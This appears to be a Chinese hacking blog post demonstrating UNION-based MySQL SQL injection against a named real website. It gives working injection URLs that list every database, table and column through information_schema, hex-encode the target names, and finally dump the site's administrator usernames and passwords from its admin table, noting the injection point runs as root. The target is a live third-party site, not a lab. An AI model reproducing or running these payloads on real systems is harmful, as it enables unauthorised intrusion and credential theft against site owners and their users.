注入点：http://www.cmiqc.com/content/info.php?id=253
注入环境：php+mysql
至于如何判断注入，如何获得页面字段数这些东西我就不说了，网上很多，我原来写的文章里也有，这里就简单的演示一下爆库、爆表和爆列。
先判断，页面字段数为8，其中2、4、7是显示位，如图：

这里说一下，这个注入点是root，但是load_file和into outfile什么的高级应用这篇文章不讨论，只说普通注入。
当然，爆库、爆表、爆字段都是需要mysql5.0或5.0以上的，这是个先决条件，这个注入点是5.1的，可以爆。
爆库、爆表、爆字段的语句写法在我原来的文章里介绍的有，这里只是做一下实例演示，链接为：
http://www.drvfan.com/archive/mysql.jsp
现在来爆库，提交构造好的语句：
http://www.cmiqc.com/content/info.php?id=253+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns
成功爆出所有库名，如图：

其实对于这种普通注入来说，爆库没什么用，除非你要旁注，这里也只是介绍一下手法。
下面开始爆表，爆表之前需要把我们得到的库名转成hex格式，想爆哪个库的表就把哪个库名转成hex格式，想爆当前网站的库的话，就先在显示位里用database()函数看一下当前库的名字，如图：

把cmiqc_gjhx取hex，如图：

结果为：
0x636D6971635F676A6878
然后提交构造出的爆表语句：
http://www.cmiqc.com/content/info.php?id=253+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_name)),5,6,7,8+from+information_schema.tables+where+table_schema=0x636D6971635F676A6878
成功爆出所有表名，如图：

下面开始爆列。
看一下哪个表是管理员表，然后把得到的管理员表的表名取hex，如图：

然后提交构造出来的爆列语句：
http://www.cmiqc.com/content/info.php?id=253+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+column_name)),5,6,7,8+from+information_schema.columns+where+table_name=0x62675F61646D696E
成功爆出所有列名，如图：

下面直接把得到的列名放到显示位里显示就行了，构造出的语句为：
http://www.cmiqc.com/content/info.php?id=253+and+1=2+union+select+1,admin,3,password,5,6,7,8+from+bg_admin
结果如图：

可以看出，这种手法比工具速度都快。